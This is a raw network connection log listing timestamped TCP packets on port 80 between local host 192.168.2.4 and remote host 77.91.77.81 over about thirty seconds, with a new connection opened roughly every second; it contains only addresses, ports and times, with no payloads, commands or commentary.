Jul 2, 2024 00:25:05.442384958 CEST	80	49730	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:05.442471981 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.553040028 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.553416967 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.560530901 CEST	80	49730	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:05.560549021 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:05.560626984 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.560668945 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.560897112 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.568037987 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.259165049 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.259229898 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.260385990 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.265388012 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.476042986 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.476109028 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.605792999 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.606093884 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.612401962 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.612484932 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.612632990 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.612782001 CEST	80	49731	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:06.612827063 CEST	49731	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:06.619695902 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.334412098 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.334485054 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.381619930 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.388427019 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.608875036 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.608957052 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.794276953 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.794723034 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.801255941 CEST	80	49732	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.801316977 CEST	49732	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.801486969 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:07.801548958 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.801911116 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:07.808712959 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.560523033 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.560722113 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.561197042 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.565912962 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.791405916 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.791620970 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.896528959 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.897243977 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.901884079 CEST	80	49733	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.901947975 CEST	49733	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.902031898 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:08.902107000 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.902273893 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:08.907582998 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.594219923 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.594293118 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.595238924 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.602046967 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.815053940 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.815150023 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.928183079 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.928487062 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.937211990 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.937231064 CEST	80	49734	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:09.937362909 CEST	49734	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.937377930 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.937644958 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:09.944834948 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:10.671236992 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:10.671392918 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:10.696626902 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:10.704195023 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:10.930313110 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:10.930416107 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.255610943 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.256154060 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.263108015 CEST	80	49735	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:11.263211012 CEST	49735	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.263613939 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:11.263705015 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.266443014 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.273260117 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:11.985855103 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:11.985919952 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.986768961 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:11.993875027 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:12.205467939 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:12.205602884 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.318645000 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.319020987 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.326956034 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:12.327111959 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.327214003 CEST	80	49736	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:12.327308893 CEST	49736	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.327614069 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:12.335551023 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.035478115 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.036628008 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.036891937 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.044605017 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.263062000 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.263149023 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.384978056 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.385315895 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.392473936 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.392618895 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.392807007 CEST	80	49737	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:13.392848015 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.392860889 CEST	49737	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:13.401071072 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.127356052 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.127568007 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.171030045 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.177700996 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.389394999 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.389467001 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.674828053 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.675188065 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.682914019 CEST	80	49738	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.682976007 CEST	49738	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.683012009 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:14.683073997 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.686851025 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:14.698437929 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.407799959 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.407907963 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.446172953 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.450995922 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.672854900 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.672914982 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.788636923 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.789048910 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.793867111 CEST	80	49739	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.793931007 CEST	49739	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.794018030 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:15.794112921 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.794337034 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:15.800287962 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.525230885 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.528665066 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.534236908 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.538944960 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.753561020 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.753942013 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.865499020 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.865994930 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.870846033 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.871138096 CEST	80	49741	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:16.871227980 CEST	49741	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.871228933 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.871475935 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:16.876211882 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:17.585386038 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:17.591197014 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:17.799068928 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:17.803946018 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:18.025494099 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:18.028301954 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.784790039 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.785456896 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.791692019 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:18.791768074 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.795806885 CEST	80	49743	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:18.795898914 CEST	49743	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.796602011 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:18.802803040 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.490165949 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.490245104 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.490986109 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.499445915 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.712841034 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.714318991 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.818628073 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.819077969 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.825849056 CEST	80	49746	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.826364994 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:19.826483011 CEST	49746	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.826553106 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.826744080 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:19.833894968 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.539058924 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.539316893 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.540147066 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.546890020 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.758532047 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.758601904 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.865551949 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.865941048 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.873858929 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.873986959 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.874114990 CEST	80	49748	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:20.874166965 CEST	49748	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.874248028 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:20.882021904 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:21.580080032 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:21.580157995 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:21.588300943 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:21.598802090 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:21.811398029 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:21.811520100 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.540165901 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.540663004 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.549171925 CEST	80	49750	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:22.549225092 CEST	49750	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.549470901 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:22.549530029 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.551599026 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:22.559786081 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.267669916 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.267748117 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.268487930 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.275578976 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.494457960 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.494538069 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.602061987 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.602416039 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.609642982 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.609740973 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.609884024 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.609894991 CEST	80	49751	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:23.609949112 CEST	49751	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:23.616658926 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.315927982 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.316015959 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.316878080 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.323961020 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.543057919 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.543152094 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.647416115 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.647805929 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.655638933 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.655786037 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.655791998 CEST	80	49752	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:24.655864000 CEST	49752	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.655972004 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:24.663268089 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.364902020 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.364983082 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.366281986 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.373282909 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.589585066 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.589775085 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.693666935 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.694087982 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.700931072 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.701185942 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.701313019 CEST	80	49753	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:25.701375008 CEST	49753	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.701524973 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:25.708971024 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.465480089 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.465636015 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.466460943 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.473716021 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.694894075 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.695022106 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.803139925 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.803680897 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.810854912 CEST	80	49754	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.810870886 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:26.810969114 CEST	49754	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.811012983 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.811196089 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:26.818135023 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:27.521189928 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:27.521270990 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:27.651746988 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:27.656523943 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:27.879669905 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:27.879854918 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.116394043 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.116898060 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.121562004 CEST	80	49755	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:28.121629953 CEST	49755	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.121650934 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:28.121727943 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.129821062 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.134608030 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:28.828418016 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:28.828562021 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.829478979 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:28.836308002 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.053596020 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.053828955 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.162417889 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.162792921 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.167644024 CEST	80	49756	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.167660952 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.167707920 CEST	49756	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.167772055 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.167996883 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.172720909 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.863626003 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:29.863753080 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.864705086 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:29.870584965 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.086694956 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.086857080 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.193645000 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.193969011 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.198766947 CEST	80	49757	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.198872089 CEST	49757	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.198952913 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.199032068 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.199284077 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.204106092 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.903441906 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:30.903582096 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.922506094 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:30.928925991 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:31.143249989 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:31.143332958 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.487860918 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.488218069 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.492918015 CEST	80	49758	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:31.492985010 CEST	49758	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.493014097 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:31.493081093 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.565912962 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:31.570822001 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.219683886 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.219769955 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.220541000 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.225331068 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.436491013 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.436568022 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.555006981 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.555309057 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.560009003 CEST	80	49759	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.560082912 CEST	49759	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.560344934 CEST	80	49760	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:32.560415983 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.560513020 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:32.565291882 CEST	80	49760	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:33.276540995 CEST	80	49760	77.91.77.81	192.168.2.4
